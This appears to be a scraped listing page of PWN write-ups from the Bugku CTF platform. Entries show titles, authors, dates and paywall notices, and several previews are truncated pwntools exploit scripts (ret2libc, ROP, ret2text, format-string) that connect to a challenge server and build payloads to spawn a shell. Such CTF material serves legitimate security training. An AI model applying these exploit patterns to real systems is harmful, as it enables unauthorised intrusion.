WP库 - Bugku CTF平台

str.vs.cstr

#CstringorC++string?##题目信息题目描述：>Whichdoyoulike,CstringorC++string?远程环境：```bashnc49.232.142.23013698```最终flag：```textCakeCTF{HW1:Remove\"call_me\"andsolveit/HW2:SetPIE+RELROandsolveit}```##程序保护对附件进行...

PWN
1天前

15206540508

瑞士军刀wp

这个命令没有回显

PWN
10天前

少年，你的剑太重了

[2020]0xGame-不会起名的废物

***收费WriteUP请购买后查看,VIP用户可免费查看***

1 金币

PWN
4月前

yimengv

[2020]0xGame-该怎么起名呢

***收费WriteUP请购买后查看,VIP用户可免费查看***

1 金币

PWN
4月前

yimengv

FlagMarket-WP

***收费WriteUP请购买后查看,VIP用户可免费查看***

1 金币

PWN
4月前

lplum

stronk boi

***收费WriteUP请购买后查看,VIP用户可免费查看***

3 金币

PWN
4月前

mtac

Win0x3

frompwnimport*host='49.232.142.230'port=10684p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)ret=rop.find_gadget(['ret']).addressp.recvuntil(b'challenge.')leak=int(p.recv(14),16)log.info(f"leak-->{h...

PWN
5月前

1000x_

EzWinner

frompwnimport*fromLibcSearcherimport*host='49.232.142.230'port=14187p=remote(host,port)elf=ELF("./pwn")rop=ROP(elf)p.recvuntil('wisely:')win=int(p.recv(14),16)success('win=%#x',win)main_addr=win-0x128...

PWN
6月前

1000x_

ret2libc

frompwnimport*host='49.232.142.230'port=10930p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')libc=ELF('./libc.so.6')main=elf.sym['main']rop=ROP(elf)rdi=rop.find_gadget(['poprdi']).addressre...

PWN
7月前

1000x_

rop64

frompwnimport*host='49.232.142.230'port=14014p=remote(host,port)context.encoding='ascii'elf=ELF('./pwn')rop=ROP(elf)offset=0x30-0x8rdi=rop.find_gadget(['poprdi','ret']).addressbinsh=next(elf.search('/...

PWN
7月前

1000x_

ret2text

frompwnimport*host='49.232.142.230'port=16954p=remote(host,port)elf=ELF('./pwn2')rop=ROP(elf)ret=rop.find_gadget(['ret']).addressshell=elf.sym['foo']p.recvuntil('exactly!\n')payload=b'a'*(0x70+0x8)+p6...

PWN
7月前

1000x_

rop32

frompwnimport*host='49.232.142.230'port=11277p=remote(host,port)p.recvuntil('Go!!!\n')elf=ELF('./pwn')binsh=next(elf.search('/bin/sh'))payload=b'a'*(0x1c+0x4)+p32(0x80491E7)+p32(binsh)p.sendline(paylo...

PWN
7月前

1000x_

babyfmt

frompwnimport*host='49.232.142.230'port=17264p=remote(host,port)context(arch='i386',log_level='debug',os='linux')elf=ELF("./pwn")key=elf.sym['backdoor']got=elf.got['read']payload=fmtstr_payload(11,{go...

PWN
7月前

1000x_

栈溢出

***收费WriteUP请购买后查看,VIP用户可免费查看***

2 金币

PWN
8月前

Darker.X

stack-wp

frompwnimport*host=''port= p=remote(host,port)#p=process('./pwn')elf=ELF('./pwn')rop=ROP('./pwn')ret=rop.find_gadget(['ret']).addressp.sendlineafter('name?\n','1')backdoor=elf.sym['shell']offset=...